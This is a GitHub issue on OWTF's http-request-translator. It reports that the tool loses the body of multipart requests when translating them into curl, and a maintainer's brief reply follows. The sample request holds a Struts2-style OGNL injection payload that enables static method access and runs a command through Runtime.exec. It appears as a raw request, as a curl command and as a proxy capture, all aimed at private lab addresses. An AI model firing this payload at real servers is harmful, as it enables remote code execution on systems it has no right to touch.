http-request-translator
http-request-translator copied to clipboard
owtf
Fails with multipart request.
Raw request
b'POST /tslwebapp/example/HelloWorld.action HTTP/1.1\r\nHost: 10.28.194.39:8080\r\nContent-Type: multipart/form-data; boundary=--------429242435\r\nContent-Length: 224\r\n\r\n----------429242435\r\nContent-Disposition: form-data; name="${#_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec(\'touch /foo\')}=1"\r\n\r\n----------429242435--'
Request CURL translated by HRT
#!/usr/bin/env bash
curl --data "----------429242435Content-Disposition: form-data; name=\"${#_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec('touch /foo')}=1\"----------429242435--" -v --request POST http://172.16.244.210:8000/tslwebapp/example/HelloWorld.action --header "Host: 172.16.244.210:8000" --header "Content-Type: multipart/form-data; boundary=--------429242435" --header "Content-Length: 224" --include
intercepted at proxy
POST /tslwebapp/example/HelloWorld.action HTTP/1.1
Host: 172.16.244.210:8000
User-Agent: curl/7.54.0
Accept: */*
Content-Type: multipart/form-data; boundary=--------429242435
Content-Length: 82
Connection: close
----------429242435Content-Disposition: form-data; name="0=1"----------429242435--
How it should look like
POST /tslwebapp/example/HelloWorld.action HTTP/1.1
Host: 172.16.244.210:8000
User-Agent: curl/7.54.0
Accept: */*
Content-Type :multipart/form-data; boundary=--------429242435
Content-Length: 224
Content-Type: application/x-www-form-urlencoded
Connection: close
----------429242435
Content-Disposition: form-data; name="${#_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('touch /foor')}=1"
----------429242435--
@ajinabraham thanks for the report! Let me investigate this and get back over the weekend :)
